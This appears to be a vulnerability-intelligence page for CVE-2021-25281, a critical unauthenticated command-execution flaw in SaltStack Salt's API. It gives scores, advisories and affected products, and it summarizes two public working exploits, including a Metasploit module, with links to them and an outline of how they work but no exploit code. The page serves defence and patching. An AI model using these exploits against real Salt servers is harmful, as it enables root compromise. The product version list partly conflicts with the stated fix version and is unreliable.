CVE-2021-25281

CRITICAL EXPLOITED NUCLEI

SaltStack Salt < 3002.5 - Unauthenticated Remote Command Execution via wheel_async Client

Title source: llm
STIX 2.1

Exploitation Summary

CVE-2021-25281 has been observed exploited in the wild (reported by VulnCheck KEV). EIP tracks 2 public exploits from researchers including Immersive-Labs-Sec, Alex Seymour, Christophe De La Fuente, including a Metasploit module exploits/linux/http/saltstack_salt_wheel_async_rce. A Nuclei detection template is also available.

AI-analyzed exploit summary This repository contains a functional exploit for CVE-2021-25281, which leverages directory traversal in SaltStack's file writing functionality to achieve arbitrary file write and potential remote code execution. The exploit includes multiple modes for writing files, creating state files for command execution, and injecting SSH keys.

Description

An issue was discovered in through SaltStack Salt before 3002.5. salt-api does not honor eauth credentials for the wheel_async client. Thus, an attacker can remotely run any wheel modules on the master.

Exploits (2)

nomisec WORKING POC 27 stars
by Immersive-Labs-Sec · poc
https://github.com/Immersive-Labs-Sec/CVE-2021-25281

This repository contains a functional exploit for CVE-2021-25281, which leverages directory traversal in SaltStack's file writing functionality to achieve arbitrary file write and potential remote code execution. The exploit includes multiple modes for writing files, creating state files for command execution, and injecting SSH keys.

Classification
Working Poc 100%
Attack Type
Rce
Complexity
Moderate
Reliability
Reliable
Target: SaltStack Salt
No auth needed
Prerequisites: Network access to the Salt master · Salt master running a vulnerable version
devstral-2 · analyzed Feb 18, 2026 Full analysis →
metasploit WORKING POC EXCELLENT
by Alex Seymour, Christophe De La Fuente · rubypocunix
https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/saltstack_salt_wheel_async_rce.rb

This Metasploit module exploits an authentication bypass (CVE-2021-25281) and directory traversal (CVE-2021-25282) in SaltStack Salt's REST API to achieve unauthenticated remote code execution as root. It leverages the maintenance process check to execute a malicious Python script placed in the Extension Module directory.

Classification
Working Poc 100%
Attack Type
Rce
Complexity
Moderate
Reliability
Reliable
Target: SaltStack Salt (versions 3002.2, 3001.4, 3000.6, and earlier)
No auth needed
Prerequisites: Network access to the Salt API (default port 8000) · Salt API service running with default or vulnerable configuration
devstral-2 · analyzed Feb 19, 2026 Full analysis →

Nuclei Templates (1)

SaltStack Salt <3002.5 - Auth Bypass
CRITICALby madrobot

References (11)

Core 11
Core References
Third Party Advisory vendor-advisory
https://security.gentoo.org/glsa/202103-01
Mailing List, Third Party Advisory mailing-list
https://lists.debian.org/debian-lts-announce/2021/11/msg00009.html
Third Party Advisory vendor-advisory
https://www.debian.org/security/2021/dsa-5011
Third Party Advisory vendor-advisory
https://security.gentoo.org/glsa/202310-22
Release Notes, Third Party Advisory
https://github.com/saltstack/salt/releases

Scores

CVSS v3 9.8
EPSS 0.9385
EPSS Percentile 99.9%
Attack Vector NETWORK
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CISA SSVC

Vulnrichment
Exploitation none
Automatable yes
Technical Impact total

Details

VulnCheck KEV 2026-01-14
CWE
CWE-287
Status published
Products (8)
debian/debian_linux 9.0
debian/debian_linux 10.0
debian/debian_linux 11.0
fedoraproject/fedora 32
fedoraproject/fedora 33
fedoraproject/fedora 34
pypi/salt 0 - 2015.8.13PyPI
saltstack/salt < 2015.8.10
Published Feb 27, 2021
Tracked Since Feb 18, 2026